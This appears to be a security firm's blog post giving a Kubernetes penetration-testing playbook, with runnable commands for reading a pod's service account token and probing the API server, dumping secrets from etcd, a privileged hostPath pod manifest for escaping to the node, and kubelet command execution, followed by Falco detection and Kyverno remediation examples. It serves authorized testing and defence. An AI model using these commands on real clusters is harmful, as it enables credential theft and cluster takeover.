Kubernetes Pentesting: Service Account Tokens, RBAC, etcd, and kube-hunter
Cloud Security
A practical Kubernetes pentest playbook covering service account token theft, RBAC graph abuse, etcd exposure, and kube-hunter scanning.
By Arjun Raghavan, Security & Systems Lead, BIPI · December 15, 2024 · 13 min read
Kubernetes pentests are graph problems. The cluster has hundreds of service accounts, role bindings, and pods, and the attacker's job is to find the path from a low-privilege foothold to cluster admin. The tooling has matured, but the same five primitives keep showing up.
Initial enumeration
- kube-hunter for external and in-cluster discovery of API server, kubelet, and dashboard
- peirates as an interactive in-pod toolkit for token theft and RBAC abuse
- kubectl auth can-i --list to enumerate effective permissions from the current SA
- rbac-tool or KubiScan to graph role bindings across the cluster
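A first pass with those tools is only a few commands. A sketch, assuming current kube-hunter and rbac-tool releases; the target IP is a placeholder, so check flags against your installed versions:

```shell
# What can the current credential do? (from a foothold pod or stolen kubeconfig)
kubectl auth can-i --list

# External recon: probe a suspected API server (203.0.113.10 is a placeholder)
kube-hunter --remote 203.0.113.10

# Graph RBAC: who can create pods, and which principals reach admin?
rbac-tool who-can create pods
rbac-tool analysis
```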
Service account token theft
Every pod by default mounts a service account token at /var/run/secrets/kubernetes.io/serviceaccount/token. If the SA has any meaningful RBAC, the pod inherits it. The first thing peirates does in a compromised pod is read that token and probe the API server. Even a service account with list pods cluster-wide is enough to discover where to pivot next.
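That first probe is a few lines of shell. A minimal sketch, assuming bash and the default token mount: it decodes the token's JWT payload to learn which service account it belongs to, then hits the API server over the pod's built-in service environment variables. Outside a pod the token file is absent and the probe is skipped.

```shell
# Default in-pod credential location; empty when run outside a pod
SA=/var/run/secrets/kubernetes.io/serviceaccount
TOKEN=$(cat "$SA/token" 2>/dev/null || true)

# Decode the JWT payload (second dot-separated field) to see which
# identity the token carries: base64url -> base64, re-pad, decode
b64url_decode() {
  local s=${1//-/+}
  s=${s//_//}
  while (( ${#s} % 4 )); do s+==; done
  printf '%s' "$s" | base64 -d
}

if [ -n "$TOKEN" ]; then
  b64url_decode "$(cut -d. -f2 <<<"$TOKEN")"; echo
  # Probe the API server with the stolen token
  APISERVER="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}"
  curl -sk -H "Authorization: Bearer $TOKEN" "$APISERVER/api/v1/pods?limit=5"
fi
```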
RBAC abuse primitives
- create pods with hostPath gives you the node filesystem and therefore the node
- patch nodes lets you label or taint and influence scheduler decisions
- create token on a privileged service account mints fresh credentials
- escalate verb on a role lets you grant yourself higher permissions
- impersonate verb is the Kubernetes equivalent of sudo to another identity
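Each primitive can be checked with kubectl auth can-i before attempting anything noisier. A sketch; the service account name at the end is a placeholder:

```shell
# Probe each escalation primitive from the current credential
# ($check is intentionally unquoted so it splits into verb + resource)
for check in "create pods" "patch nodes" "create serviceaccounts/token" \
             "escalate clusterroles" "impersonate users"; do
  printf '%-30s %s\n' "$check:" "$(kubectl auth can-i $check 2>/dev/null || echo no)"
done

# If token creation is allowed, mint a fresh credential for a target SA
# ("privileged-sa" is a placeholder name)
kubectl create token privileged-sa -n kube-system --duration=1h
```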
etcd exposure
etcd stores every secret in the cluster, unencrypted at rest by default. If you can reach etcd from a pod with network access, or you compromise a control plane node, you have every secret it holds. Encryption at rest is configurable, but it is off by default in upstream Kubernetes, and many managed offerings only began enabling it in recent versions.
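Reading secrets straight out of etcd is one etcdctl call once you can reach the client port. The endpoint IP is a placeholder and the certificate paths are kubeadm defaults; adjust both for the target:

```shell
# List every secret key in the cluster (10.0.0.5 is a placeholder endpoint;
# without encryption at rest, fetching any key returns plaintext protobuf)
ETCDCTL_API=3 etcdctl \
  --endpoints=https://10.0.0.5:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get /registry/secrets --prefix --keys-only
```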
Node escape from a pod
- hostPath mount of / gives full node filesystem from the pod
- host network namespace exposes node services like kubelet on 10250
- Privileged pods can load kernel modules and own the node directly
- Docker or containerd socket mounts let the pod control the runtime
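When RBAC allows pod creation, several of these escapes combine into a single pod spec. A sketch of the classic node-shell manifest; the pod and node names are placeholders, and a hardened cluster's admission policy should reject every field in it:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: nodeshell          # placeholder name
spec:
  nodeName: target-node    # placeholder: pin to the node you want
  hostNetwork: true
  hostPID: true
  containers:
  - name: shell
    image: alpine
    command: ["chroot", "/host", "/bin/sh"]
    stdin: true
    tty: true
    securityContext:
      privileged: true
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /              # full node filesystem from inside the pod
```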
The cluster admin who says "we use RBAC" has not run rbac-tool against their own cluster recently.
Kubelet on 10250
The kubelet API on port 10250, if exposed and unauthenticated, allows pod exec into any pod on the node. Cloud providers usually gate this, but on-prem and self-managed clusters frequently leave it accessible. kube-hunter flags this immediately.
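Checking it by hand takes two requests against the kubelet's own API, not the API server. The node IP, namespace, pod, and container names below are placeholders:

```shell
NODE=10.0.0.5   # placeholder node IP

# Anonymous read: if this returns pod specs, authentication is effectively off
curl -sk "https://$NODE:10250/pods"

# Command execution in a container via the kubelet /run endpoint
curl -sk -X POST "https://$NODE:10250/run/default/target-pod/app" -d "cmd=id"
```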
Detection
- Audit logs for create pods with privileged or hostPath fields outside expected namespaces
- Falco rules for shell in container and unexpected outbound network from system namespaces
- API server audit logging (--audit-policy-file, --audit-log-path) shipped to a SIEM; --audit-log-maxage only governs local rotation, not collection
- Cilium or other CNI policies enforcing pod-to-API-server segmentation
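As one concrete detection, a Falco rule for shells in system namespaces might look like this sketch. It leans on the spawned_process and container macros from Falco's default ruleset, and the namespace and shell lists are assumptions to tune per cluster:

```yaml
- rule: Shell spawned in system namespace pod
  desc: Interactive shell inside a pod in a system namespace (sketch; tune lists)
  condition: >
    spawned_process and container
    and proc.name in (bash, sh, ash)
    and k8s.ns.name in (kube-system, kube-public)
  output: "Shell in system namespace (ns=%k8s.ns.name pod=%k8s.pod.name cmd=%proc.cmdline)"
  priority: WARNING
```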
Remediation
- Enforce Pod Security Standards restricted profile across all non-system namespaces
- Set automountServiceAccountToken: false on pods and service accounts unless the workload truly needs API access
- Encrypt etcd at rest and restrict control plane network access
- Use OPA Gatekeeper or Kyverno policies to block hostPath, privileged, and host namespaces
- Move secrets to an external store like Vault or cloud KMS rather than Kubernetes Secrets
- Run rbac-tool quarterly and alert on new admin-reachable principals
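The hostPath block, for instance, is a short Kyverno ClusterPolicy. This sketch follows the pattern of Kyverno's published disallow-host-path policy; validate it against your Kyverno version before enforcing:

```yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: block-hostpath
spec:
  validationFailureAction: Enforce
  rules:
  - name: no-hostpath
    match:
      any:
      - resources:
          kinds: [Pod]
    validate:
      message: "hostPath volumes are not allowed"
      pattern:
        spec:
          # =() optional anchor, X() negation anchor: if volumes exist,
          # none of them may set hostPath
          =(volumes):
          - X(hostPath): "null"
```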
Closing
Kubernetes is not insecure by design, but its defaults are permissive and its admins are usually outnumbered by namespaces. A monthly run of kube-hunter, peirates in a controlled pod, and rbac-tool will surface the path your adversary would take. Walk it before they do.
Read more field notes, explore our services, or get in touch at info@bipi.in.